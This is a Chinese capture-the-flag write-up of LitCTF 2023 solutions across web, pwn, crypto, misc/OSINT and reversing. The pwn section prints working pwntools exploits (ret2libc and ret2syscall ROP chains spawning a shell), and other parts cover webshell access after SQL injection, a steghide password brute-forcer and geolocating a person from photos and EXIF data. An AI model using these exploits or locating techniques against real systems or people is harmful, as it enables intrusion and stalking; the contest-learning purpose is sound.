LitCTF-Writeup-BlackManba

成绩

LitCTF2023是郑州轻工业大学首届网络安全赛,作为第一次举办的网络安全类型的校赛,它的难度极其容易,很适合对CTF感兴趣但是没有基础的同学。 旨在推动本校学生去了解网络安全相关知识,增强信息安全意识,培养对网络安全的兴趣,同时作为本次比赛的策划 出题 Cha0s战队也需要一些新鲜的血液来加入我们。

最终成绩第十二名

image-20230515131920382

各方向ctfer:

Web :cyyyy

Pwn:kn1fe

Re:isiswo

Crypto:isiswo、knife

Misc:zbclove、knife

再次感谢官方平台!感谢探姬!

WEB

1.我Flag呢?

image-20230514212505421

2.导弹迷踪

image-20230514212632551

3.Follow me and hack me

image-20230514212858452

4.PHP是世界上最好的语言!!

image-20230514213014762

5.Vim yyds

访问 .index.php.swp.

Give_Me_Your_Flagbase64编码,用cmd传命令即可

image-20230514213225713

image-20230514213422296

6.作业管理系统

创建文件

image-20230514213541843

编辑文件

image-20230514213600535

访问文件

image-20230514213618485

7.这是什么?SQL !注一下 !

直接写吗

image-20230514213807198

蚁剑连接,得到数据库密码

image-20230514214025125

连接数据库得到flag

image-20230514214126611

8.Http pro max plus

构造如下数据报

image-20230514214543872

再看

image-20230514214602374

得到

image-20230514214616817

9.Ping

image-20230514214742730

10.1zjs

image-20230514214852352

jsfuck,扔控制台

image-20230514215034442

11.就当无事发生

image-20230514215246412

12.flag点击就送

密码全靠猜

image-20230514215435837

image-20230514215512463

13.彩蛋

  1. image-20230514215731979

2.www.zip得到image-20230514215923185

image-20230514220006874

image-20230514220026948

image-20230514220151561

PWN

只需要nc一下

连上环境输入env查看环境变量即可

口算题卡

计算题,直接上脚本:

from pwn import *
import re
context.log_level = 'debug'
#io=process("./")
io=remote("node6.anna.nssctf.cn",28273)
#elf=ELF
r = lambda : io.recv()
rx = lambda x: io.recv(x)
ru = lambda x: io.recvuntil(x)
rud = lambda x: io.recvuntil(x, drop=True)
uu64= lambda : u64(io.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
s = lambda x: io.send(x)
sl = lambda x: io.sendline(x)
sa = lambda x, y: io.sendafter(x, y)
sla = lambda x, y: io.sendlineafter(x, y)
shell = lambda : io.interactive()
#libc=elf.libc
r()
while(1):
	a=r()
	a_str = a.decode('utf-8')
	print(a)
	expression = re.search(r'\d+\s*[-+*\/]\s*\d+', a_str).group()
	result = eval(expression)
	print(result)
	sl(str(result))
	sleep(0.3)
shell()

狠狠的溢出涅

栈溢出,先泄露puts函数的地址,从而计算出libc基址,然后再栈溢出拿shell

from pwn import *
context.log_level = 'debug'
#io=process("./pwn4")
io=remote("node5.anna.nssctf.cn",28770)
elf=ELF("./pwn4")
r = lambda : io.recv()
rx = lambda x: io.recv(x)
ru = lambda x: io.recvuntil(x)
rud = lambda x: io.recvuntil(x, drop=True)
uu64= lambda : u64(io.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
s = lambda x: io.send(x)
sl = lambda x: io.sendline(x)
sa = lambda x, y: io.sendafter(x, y)
sla = lambda x, y: io.sendlineafter(x, y)
shell = lambda : io.interactive()
#libc=elf.libc
libc=ELF("./libc-2.31.so")
#gdb.attach(io)
rdi=0x4007d3
payload=b'\x00'*0x68+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(elf.sym['main'])
sl(payload)
leak_addr=uu64()
base=leak_addr-libc.sym['puts']
print(hex(base))
ret=0x400556
system=base+libc.sym['system']
sh=base+next(libc.search(b'/bin/sh\x00'))
payload=b'\x00'*0x68+p64(ret)+p64(rdi)+p64(sh)+p64(system)
sl(payload)
shell()

ezlogin

img

这里他strcpy了一下,有个栈溢出,然而这道题的坑点是strcpy遇到\x00就截止了,因此我不得不自己写了个发送函数使得从长往短覆盖,有了发送函数就好说了,首先我们需要向程序中写入/bin/sh,这一点用ROPgadget的 ropchain功能即可,接着通过ret2syscall来执行execve("/bin/sh"),exp如下:

from pwn import *
context.log_level = 'debug'
context.arch="amd64"
io=process("./pwn4")
#io=remote("node5.anna.nssctf.cn",28952)
elf=ELF("./pwn4")
r = lambda : io.recv()
rx = lambda x: io.recv(x)
ru = lambda x: io.recvuntil(x)
rud = lambda x: io.recvuntil(x, drop=True)
uu64= lambda : u64(io.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
s = lambda x: io.send(x)
sl = lambda x: io.sendline(x)
sa = lambda x, y: io.sendafter(x, y)
sla = lambda x, y: io.sendlineafter(x, y)
shell = lambda : io.interactive()
libc=elf.libc
#gdb.attach(io)
pause()
rdi=0x400706
rdx=0x448c95
rsi=0x410043

syscall=0x4012bc
ret=0x400416
rax=0x4005af
def set_pl(payload):
	content=b""
	for i in range(len(payload), -1, -1):  # 从 len(payload)-1 开始递减,每次减 1
		prev_inuse=0
		print(i)
		if(payload[i:i+1]==b'\x00'):
			pl = b'a' * 0x108 +b'a'*(i)+ payload[i:i+1]
			sleep(0.3)
			s(pl)
		elif((payload[i:i+1]!=b'\x00' and payload[i-1:i]==b'\x00') or i==0):
			print(6666)
			print(content)
			pl = b'a' * 0x108 +b'a'*(i)+payload[i:i+1]+content
			print(pl)
			sleep(0.3)
			s(pl)
			content=b""
		else:
			tem=content
			content=payload[i:i+1]+tem
			print(content)
def quit():
	sl(b"PASSWORD\x00")
p=b''
p += pack(0x0000000000410043) # pop rsi ; ret
p += pack(0x00000000006b90e0) # @ .data
p += pack(0x00000000004005af) # pop rax ; ret
p += b'/bin//sh'
p += pack(0x000000000047f341) # mov qword ptr [rsi], rax ; ret
p += pack(0x0000000000410043) # pop rsi ; ret
p += pack(0x00000000006b90e8) # @ .data + 8
p+=p64(0x400ab0)
set_pl(p)
quit()
set_pl(p64(rdi)+p64(0x6b90e0)+p64(rsi)+p64(0)+p64(rdx)+p64(0)+p64(rax)+p64(59)+p64(syscall))
pause()
quit()
shell()

CRYPTO

梦想是红色的

直接社会主义核心价值观解密

社会主义核心价值观加密解密 (duoluosb.com)

Hex?Hex!

hex转字符串,每两个为一组,上脚本

hex_string = "4c69744354467b746169313131636f6f6c6c616161217d"

# 将字符串拆分为两个数字一组
hex_pairs = [hex_string[i:i+2] for i in range(0, len(hex_string), 2)]

# 将每组数字转换为对应的 ASCII 字符
ascii_chars = [chr(int(hex_pair, 16)) for hex_pair in hex_pairs]

# 将所有字符连接在一起
decoded_string = ''.join(ascii_chars)

print(decoded_string)

原来你也玩原神

把那个图片倒过来看,最后一行就是flag,根据前面的HELLO TRAVELER来进一步确定字母之间的对照关系

家人们!谁懂啊,RSA签到都不会

知道p和q了,求m简直小菜一碟

from Crypto.Util.number import *

p = 12567387145159119014524309071236701639759988903138784984758783651292440613056150667165602473478042486784826835732833001151645545259394365039352263846276073
q = 12716692565364681652614824033831497167911028027478195947187437474380470205859949692107216740030921664273595734808349540612759651241456765149114895216695451
e = 65537
n = p*q  
c = 108691165922055382844520116328228845767222921196922506468663428855093343772017986225285637996980678749662049989519029385165514816621011058462841314243727826941569954125384522233795629521155389745713798246071907492365062512521474965012924607857440577856404307124237116387085337087671914959900909379028727767057

phi = (p-1)*(q-1)  
d = inverse(e, phi)  

m = pow(c, d, n)
flag = long_to_bytes(m)
print(flag)

factordb

n特别小,直接用在线网站分

factordb.com

from Crypto.Util.number import *


p =  275127860351348928173285174381581152299
q =  319576316814478949870590164193048041239
e = 65537
n = p * q
c = 87677652386897749300638591365341016390128692783949277305987828177045932576708

d = pow(e, -1, (p-1)*(q-1))
m = pow(c, d, n)
print(long_to_bytes(m))

我测你vva

cipher = "HYEQJvPZ~X@+Bp"
plain = ""
for i in range(len(cipher)):
    if i % 2 == 0:
        dec = ord(cipher[i]) - i
    else:
        dec = ord(cipher[i]) + i
    plain += chr(dec)
print(plain)

Is this only base?

先w型栅栏,栏数23,接着base64解码,接着凯撒密码,位移23

P_Leak

from Crypto.Util.number import long_to_bytes
import gmpy2
e = 65537
n = 50612159190225619689404794427464916374543237300894011803225784470008992781409447214236779975896311093686413491163221778479739252804271270231391599602217675895446538524670610623369953168412236472302812808639218392319634397138871387898452935081756580084070333246950840091192420542761507705395568904875746222477
dp = 5892502924236878675675338970704766304539618343869489297045857272605067962848952532606770917225218534430490745895652561015493032055636004130931491316020329
c = 39257649468514605476432946851710016346016992413796229928386230062780829495844059368939749930876895443279723032641876662714088329296631207594999580050131450251288839714711436117326769029649419789323982613380617840218087161435260837263996287628129307328857086987521821533565738409794866606381789730458247531619
for i in range(1,e):
    if((dp*e)-1) % i == 0:
        if n % ((((dp * e) - 1) // i) + 1) == 0:
            p = (((dp * e) - 1) // i) + 1
            q = n // p
            d = gmpy2.invert(e,(p-1)*(q-1))
            m = pow(c,d,n)
            print(long_to_bytes(m))

隐晦的聊天记录

这个直接将密文与明文按位异或当做密钥然后与后面的明文按位异或可得后面的密文

arr1=[0x6c,0x73,0xd5,0x24,0x0a,0x94,0x8c,0x86,0x98,0x1b,0xc2,0x94,0x81,0x4d]
string="attack at dawn"
string1 = "Monday or Thur"
ints = [ord(char) for char in string]
int1 = [ord(char) for char in string1]
print(ints)
print(arr1)
for i in range(14):
	arr1[i]=arr1[i]^ints[i]
print(arr1)
for i in range(14):
	arr1[i]=arr1[i]^int1[i]
print(arr1)
for i in range(14):
	print(hex(arr1[i]))

Virginia

直接在线网站先爆破密钥

Vigenere Solver | guballa.de

爆出来密钥为flag

然后偏移为10依次增加

key = [86, 116, 128, 80, 98, 85, 139, 122, 134, 114, 125, 136, 117, 123, 129, 127, 128, 128, 142, 130, 140, 147, 127, 132, 131, 136, 151, 134, 152, 164]

def caesar_decrypt(ciphertext, shift):
    plaintext = ''
    for char in ciphertext:
        plaintext += chr((char - shift) % 256)
    return plaintext

plaintext = ''
for i, char in enumerate(key):
    plaintext += caesar_decrypt([char], i + 10)

print(plaintext)

ez_math

from Crypto.Util.number import *
from gmpy2 import iroot

# Given values
n = 2230791374046346835775433548641067593691369485828070649075162141394476183565187654365131822111419512477883295758461313983481545182887415447403634720326639070667688614534290859200753589300443797
c = 2168563038335029902089976057856861885635845445863841607485310134441400500612435296818745930370268060353437465666224400129105788787423156958336380480503762222278722770240792709450637433509537280
hint = 392490868359411675557103683163021977774935163924606169241731307258226973701652855448542714274348304997416149742779376023311152228735117186027560227613656229190807480010615064372521942836446425717660375242197759811804760170129768647414717571386950790115746414735411766002368288743086845078803312201707960465419405926186622999423245762570917629351110970429987377475979058821154568001902541710817731089463915930932142007312230897818177067675996751110894377356758932

# Recover p and q from the hint
p_approx = iroot(hint, 3)[0] + 1
q_approx = iroot(p_approx**3 - hint, 5)[0]

# Calculate phi(n) and d
phi_n = (p_approx - 1) * (q_approx - 1)
d = inverse(65537, phi_n)

# Decrypt the ciphertext
m = pow(c, d, n)

# Print the decrypted message
print(long_to_bytes(m))

BABYLCG

别问我沉默的原因,因为是问的CHATGGG

from Crypto.Util.number import *
def gcd(a,b): 
    if(b==0): 
        return a 
    else: 
        return gcd(b,a%b) 
s =  [699175025435513913222265085178805479192132631113784770123757454808149151697608216361550466652878, 193316257467202036043918706856603526262215679149886976392930192639917920593706895122296071643390, 1624937780477561769577140419364339298985292198464188802403816662221142156714021229977403603922943, 659236391930254891621938248429619132720452597526316230221895367798170380093631947248925278766506, 111407194162820942281872438978366964960570302720229611594374532025973998885554449685055172110829, 1415787594624585063605356859393351333923892058922987749824214311091742328340293435914830175796909, 655057648553921580727111809001898496375489870757705297406250204329094679858718932270475755075698, 1683427135823894785654993254138434580152093609545092045940376086714124324274044014654085676620851, 492953986125248558013838257810313149490245209968714980288031443714890115686764222999717055064509, 70048773361068060773257074705619791938224397526269544533030294499007242937089146507674570192265]
t = []
for i in range(9):
    t.append(s[i]-s[i-1]) 
all_n = []
for i in range(7):
    all_n.append(gcd((t[i+1]*t[i-1]-t[i]*t[i]), (t[i+2]*t[i]-t[i+1]*t[i+1]))) 

MMI = lambda A, n,s=1,t=0,N=0: (n < 2 and t%N or MMI(n, A%n, t, s-A//n*t, N or n),-1)[n<1] #逆元计算
for n in all_n:
    n=abs(n)
    if n==1:
        continue
    a=(s[2]-s[1])*MMI((s[1]-s[0]),n)%n
    ani=MMI(a,n)
    b=(s[1]-a*s[0])%n
    seed = (ani*(s[0]-b))%n
    plaintext=seed
    print(long_to_bytes(plaintext))

你是我的关键词(Keyworld)

关键词密码解密,key是you

The same common divisor

n1与n2的最大公约数是p,求出p后面都好说了

import math
import gmpy2

from Crypto.Util.number import *

e=65537

n1= 9852079772293301283705208653824307027320071498525390578148444258198605733768947108049676831872672654449631852459503049139275329796717506126689710613873813880735666507857022786447784753088176997374711523987152412069255685005264853118880922539048290400078105858759506186417678959028622484823376958194324034590514104266608644398160457382895380141070373685334979803658172378382884352616985632157233900719194944197689860219335238499593658894630966428723660931647038577670614850305719449893199713589368780231046895222526070730152875112477675102652862254926169713030701937231206405968412044029177246460558028793385980934233
n3= 4940268030889181135441311597961813780480775970170156650560367030148383674257975796516865571557828263935532335958510269356443566533284856608454193676600884849913964971291145182724888816164723930966472329604608512023988191536173112847915884014445539739070437180314205284883149421228744714989392788108329929896637182055266508625177260492776962915873036873839946591259443753924970795669864031580632650140641456386202636466624658715315856453572441182758855085077441336516178544978457053552156714181607801760605521338788424464551796638531143900048375037218585999440622490119344971822707261432953755569507740550277088437182
#c1= 7066425618980522033304943700150361912772559890076173881522840300333719222157667104461410726444725540513601550570478331917063911791020088865705346188662290524599499769112250751103647749860198318955619903728724860941709527724500004142950768744200491448875522031555564384426372047270359602780292587644737898593450148108629904854675417943165292922990980758572264063039172969633878015560735737699147707712154627358077477591293746136250207139049702201052305840453700782016480965369600667516646007546442708862429431724013679189842300429421340122052682391471347471758814138218632022564279296594279507382548264409296929401260
#c2= 854668035897095127498890630660344701894030345838998465420605524714323454298819946231147930930739944351187708040037822108105697983018529921300277486094149269105712677374751164879455815185393395371001495146490416978221501351569800028842842393448555836910486037183218754013655794027528039329299851644787006463456162952383099752894635657833907958930587328480492546831654755627949756658554724024525108575961076341962292900510328611128404001877137799465932130220386963518903892403159969133882215092783063943679288192557384595152566356483424061922742307738886179947575613661171671781544283180451958232826666741028590085269
n2 = n1^n3
p = math.gcd(n1,n2)
print(p)
#p = 94719927424407179559097379278598331426219665736925758883356208017201441609501349561869578255304543730077703898951251809509592215259248796747648789953238424438984058591393245455685873538467037385791128865102181068065167783963401976811367747317190298098904229431166441000923777869516488107339457633589707290103

p = 94719927424407179559097379278598331426219665736925758883356208017201441609501349561869578255304543730077703898951251809509592215259248796747648789953238424438984058591393245455685873538467037385791128865102181068065167783963401976811367747317190298098904229431166441000923777869516488107339457633589707290103
n = 9852079772293301283705208653824307027320071498525390578148444258198605733768947108049676831872672654449631852459503049139275329796717506126689710613873813880735666507857022786447784753088176997374711523987152412069255685005264853118880922539048290400078105858759506186417678959028622484823376958194324034590514104266608644398160457382895380141070373685334979803658172378382884352616985632157233900719194944197689860219335238499593658894630966428723660931647038577670614850305719449893199713589368780231046895222526070730152875112477675102652862254926169713030701937231206405968412044029177246460558028793385980934233
e = 65537
c = 7066425618980522033304943700150361912772559890076173881522840300333719222157667104461410726444725540513601550570478331917063911791020088865705346188662290524599499769112250751103647749860198318955619903728724860941709527724500004142950768744200491448875522031555564384426372047270359602780292587644737898593450148108629904854675417943165292922990980758572264063039172969633878015560735737699147707712154627358077477591293746136250207139049702201052305840453700782016480965369600667516646007546442708862429431724013679189842300429421340122052682391471347471758814138218632022564279296594279507382548264409296929401260

q = n // p

phi_n = (p - 1) * (q - 1)

d = gmpy2.invert(e, phi_n)

m = pow(c, d, n)

plaintext = ""
while m > 0:
    plaintext = chr(m % 256) + plaintext
    m //= 256

print("明文为:", plaintext)

e的学问

e与phi_n不互素

import gmpy2
from Crypto.Util.number import *


# 当e约去公约数后与phi互素
def decrypt(p, q, e, c):
    n = p * q
    phi = (p - 1) * (q - 1)
    t = gmpy2.gcd(e, phi)
    d = gmpy2.invert(e // t, phi)
    m = pow(c, d, n)
    print(m)
    msg = gmpy2.iroot(m, t)
    print(msg)
    if msg[1]:
        print(long_to_bytes(msg[0]))

p= 86053582917386343422567174764040471033234388106968488834872953625339458483149
q= 72031998384560188060716696553519973198388628004850270102102972862328770104493
e= 74
c= 3939634105073614197573473825268995321781553470182462454724181094897309933627076266632153551522332244941496491385911139566998817961371516587764621395810123

decrypt(p, q, e, c)

prime

一开始看了题简单分析了一下,认为就是求质数与指数乘积最大的那个

img

这个最大数的阶乘会覆盖所有的其他数

后来发现假如质数i的指数如果是i的倍数,那么此时的最大值就不是最小的阶乘数了

img image-20230516005952803

举个例子,需要一个数的阶乘覆盖100个5,但如果直接500的阶乘的话其实相当于覆盖了124个5

那么就将输入经过处理,得到对应的那个数即124->100

100->81

然后再分别与对应的质数相乘,选出最大的那个数,即为那个能覆盖所有数的最小阶乘数

#include <stdio.h>
#include <stdbool.h>
#include <math.h>

#define MAX_SIZE 100

long long int primes[MAX_SIZE];
//找输入对应的数
void find_primes(int m) {
    int i = 0;
    for (int num = 2; i < m; num++) {
        bool is_prime = true;
        for (int j = 2; j <= sqrt(num); j++) {
            if (num % j == 0) {
                is_prime = false;
                break;
            }
        }
        if (is_prime) {
            primes[i++] = num;
        }
    }
}
//找质数
long long find_x(long long y, long long i) {
    long long low = 1, high = y * i;
    while (low < high) {
        long long mid = (low + high) / 2;
        long long s = 0, t = mid;
        while (t > 0) {
            s += t;
            t /= i;
        }
        if (s >= y) {
            high = mid;
        } else {
            low = mid + 1;
        }
    }
    return low;
}
//找最大数
long long int findMax(long long int arr[], int size) {
    long long int max = arr[0];
    for (int i = 1; i < size; i++) {
        if (arr[i] > max) {
            max = arr[i];
        }
    }
    return max;
}

int main() {
    int num;
    long long int m;
    scanf("%d", &num);
    find_primes(num);
    long long arr1[num],x; 
    for (int i = 0; i < num; i++) {
        scanf("%lld", &x);
        long long int y = find_x(x,primes[i]);
        arr1[i] = y * primes[i];//处理后的数与对应质数相乘
    }
    m = findMax(arr1, num);
    printf("%lld", m);
    return 0;
}

999分

Small

这个题也是,说了一大堆,分析一下,其实就是每读入一个数,就求最大数和最小数之差的二倍

只要按正常顺序排,就是符号要求的

img

然后也没啥好说的了,本质很简单的一个题

#include <stdio.h>

int main() {
    long long int m, x0, x1, max_val, min_val;
    scanf("%lld", &m);
    scanf("%lld", &x0);
    scanf("%lld", &x1);
    max_val = x0 > x1 ? x0 : x1;
    min_val = x0 < x1 ? x0 : x1;
    printf("0\n");
    printf("%lld\n", (max_val - min_val) * 2);
    for (int i = 2; i < m; i++) {
        scanf("%lld", &x1);
        if (x1 > max_val) {
            printf("%lld\n", (x1 - min_val) * 2);
            max_val = x1;
        } else if (x1 < min_val) {
            printf("%lld\n", (max_val - x1) * 2);
            min_val = x1;
        } else {
            printf("%lld\n", (max_val - min_val) * 2);
        }
    }
    return 0;
}

997分

(上传代码和上传文件的分不一样,不知道为啥)

SEEM和探姬的游戏

这个没细看,就输入了个1得了个时间分(滑稽)

MISC

zbclove师傅主打抖音社工

【Minecraft】玩的开心~~~

先撸树,再撸石头,再撸铁,合成铁块造铁傀儡杀

What_1s_BASE (初级)

得到一段base64,解码

image-20230514225053923

Take me hand (初级)

得到一个流量数据包

image-20230514225224077

404notfound (初级)

放进010里面,搜索关键字ctf就得到了

image-20230514225429427

喜欢我的压缩包么 (初级)

打开需要密码

image-20230514225534807

直接爆破出来

image-20230514225629356

这羽毛球怎么只有一半啊(恼 (初级)

图片只有一半,一看就隐藏了

我这里用了b神的软件

image-20230514225851801

image-20230514225901393

破损的图片(初级)

放进010里面,发现文件头不对

image-20230514230020831

修改后打开得到png图片

image-20230514230107135

image-20230516010836239

Osint小麦果汁

打开图片发现墙上的wif可疑,百度

image-20230514230328922

image-20230514230415517

就叫黑客与精酿

OSINT 探姬去哪了?_1

得到两张图

image-20230514230558974

第一张日了

看第二张图

image-20230514230636747

重点就是这个酒店,但是又看不清,第一次以为是松森酒店

只能慢慢试

最后在高德地图找到松果酒店

至于哪家,再试就出来了

Screenshot_2023-05-14-23-07-56-859_com.autonavi.m

OSINT 这是什么地方?!

image-20230514230936059

这个确实废了点时间

这个用百度搜图,但是找到的只是视频,没有直接找到了地址

但是找到了视频的名称,线索

image-20230516010404959

抖音搜索这个视频名字,就找到一个解说,社工出来了

Screenshot_2023-05-14-23-13-27-407_com.ss.android

OSINT 探姬去哪了?_2

image-20230514231452985

之前在公众号上也见过这个活动

找到关键字,直接百度,郑州站

但是还没有找到地址

抖音社工

Screenshot_2023-05-14-23-17-16-306_com.ss.android

上面写着就是店名

OSINT 探姬去哪了?_0

image-20230516010548096

这种大众性的图一猜就是属性有东西

image-20230514232054551

给了经纬度,直接放进kali,用exiftool给转换一下

image-20230514232134536

用在线网址转换一下

image-20230514232306703

然后百度定位到相关地址

image-20230514232924644

Screenshot_2023-05-14-23-25-09-083_com.autonavi.m Screenshot_2023-05-14-23-25-26-033_com.autonavi.m

OSINT 探姬去哪了?_3

image-20230516010615213

md我还下载这个app扫了扫

直接上抖音(抖音社工)

先找几个校区,然后确定了是科学校区

Screenshot_2023-05-14-23-32-01-997_com.ss.android

发现这是教学楼,继续找教学楼名字

Screenshot_2023-05-14-23-32-26-807_com.ss.android

两仪生四象

_hash = {"乾": "111", "兑": "011", "离": "101", "震": "001", "巽": "110", "坎": "010", "艮": "100", "坤": "000"}
_reverse_hash = {v: k for k, v in _hash.items()}

encoded_text = "坤乾兑艮兑坎坤坤巽震坤巽震艮兑坎坤震兑乾坤巽坤艮兑震巽坤巽艮坤巽艮艮兑兑艮震兑乾坤乾坤坤兑艮艮坤巽坤坤巽坎坤兑离坎震艮兑坤巽坎艮兑震坤震兑乾坤乾坎坤兑坎坤震艮离坤离乾艮震艮巽震离震坤巽兑艮兑坎坤震巽艮坤离乾艮坎离坤震巽坎坤兑坤艮兑震巽震巽坎坤巽坤艮兑兑坎震巽兑"

binary_text = ""
for c in encoded_text:
    binary_text += _hash[c]

text = ""
for i in range(0, len(binary_text), 10):
    try:
        text += chr(int(binary_text[i:i + 10], 2))
    except ValueError:
        text += " "

print("LitCTF{" + text + "}")

ssvvgg

svg实际上是base64组成的,解码,发现文件尾提示爆破steghide密码

from subprocess import *

def foo():
    stegoFile='output.jpg'#隐写的图片
    extractFile='secret.txt'#爆破的密码
    passFile='password_table3.txt'#字典

    errors=['could not extract','steghide --help','Syntax error']
    cmdFormat='steghide extract -sf "%s" -xf "%s" -p "%s"'
    f=open(passFile,'r')
    
    for line in f.readlines():
        cmd=cmdFormat %(stegoFile,extractFile,line.strip())
        p=Popen(cmd,shell=True,stdout=PIPE,stderr=STDOUT)
        content=str(p.stdout.read(),'gbk')
        print(cmd)
        for err in errors:
            if err in content:
                break
        else:
            print (content),
            print ('the passphrase is %s' %(line.strip()))
            f.close()
            return

if __name__ == '__main__':
    foo()
    print ('ok')
    pass

爆破出来密码为666666

(校外)雪山的秘密

得到一段摩斯电码

放进audacity

image-20230514233551963

3.2-..3-.23-.32-32.-3..-/..2-223-.32-322-..3-..2-/2.2-3..-232-223-..2-.32-/3.2-..3-.23-3.3-..3-/.32-32.-322-.3.-/.3.-33.-22.-23.-..3-.23-..2-3..-/.2.-..3-2.2-3..-.23-/23.-.33-.32-2.2-3..-/3.2-223-322-332-3..-233

百度一下

原神的

image-20230514233754078

(校外)easy_shark

image-20230514233903343

打开要密码,

放进010里面,伪加密

修改后打开

image-20230514234033039

image-20230514234104546

搜索POST

image-20230514234315313

追踪HTTP流

image-20230514234337009

得到木马的key

然后把流量包binwalk一下

Foremost提取不出来

找到一个关键txt

2654641fCan you request my question?


(x^2-x**2)+(x-17)(x-77)=0

#gezx{j13p5oznp_1t_z_900y_k3z771h_k001}
[S]
/flag
[E]
766ab9

一看就是加密

解方程得到解是17和77

两个密钥的密码试,最后是仿射密码

image-20230514234648839

拼接得到flag

RE

世界上最棒的程序员

ida32打开点进start就得到了flag,或者exe输入0 1

LitCTF{I_am_the_best_programmer_ever}

ez_XOR

ida32打开看见E`}J]OrQF[V8zV:hzpV}fVF[t

有个xor的函数,点进去发现其实是跟9异或

image-20230514204634717

enbase64

首先是basecheck看见了密文GQTZlSqQXZ/ghxxwhju3hbuZ4wufWjujWrhYe7Rce7ju

直接解base64是不行的

调试的时候发现image-20230514214009446

是换表base64

image-20230514214043186

snake

pyc文件直接反编译不行,放winhex里发现缺了魔数

42 0D 0D 0Aimage-20230514221531077

然后再反编译

image-20230514221623408

就看到了代码,把多余的全删了直接执行就行

flag = [
30, 196,
52, 252, 49, 220, 7, 243,
3, 241, 24, 224, 40, 230,
25, 251, 28, 233, 40, 237,
4, 225, 4, 215, 40, 231,
22, 237, 14, 251, 10, 169]
for i in range(0, len(flag), 2):
    flag[i], flag[i + 1] = flag[i + 1] ^ 136, flag[i] ^ 119
print(flag)
flag1=''
for i in flag:
    flag1+=chr(i)
print(flag1)

LitCTF{python_snake_is_so_easy!}

For Aiur

这个题也是python反编译,先拿pyinstxtractor.py处理一下,然后把里面的pyc文件反编译一下,不过好像是因为我的python版本问题没反编译成功,就在网站反编译了一下,得到的代码不全,没看见flag,但是发现q能快速建造,于是就试着建了一下,好像是第20个的时候就得到了flag图片

程序和人有一个能跑就行了

image-20230514222835538

看了那个函数是rc4

litctf就是密钥,下面的那些估计是密文

但是解出来的是fackflag

动调了一下,发现了另一串字符

image-20230514223036306

把这段解密一下得到

image-20230514223838797

debase64

测试输入,要输入20个,于是patch了一下逻辑方便测试

一开始以为是要解base64,后来才发现是反过来的

测试aaaaaa

image-20230514224442196

image-20230514224536949

以为加密一下就行了,结果不对,测试了abcddcba,才发现是每四位反过来的

image-20230514224906268

Ru0Yllae0nKys4Bw/wAA

根据题目提示修改一下得到flag

Y0uReallyKn0wB4s3===

posted @ 2023-05-16 01:11  bzbzzbc  阅读(743)  评论(1编辑  收藏  举报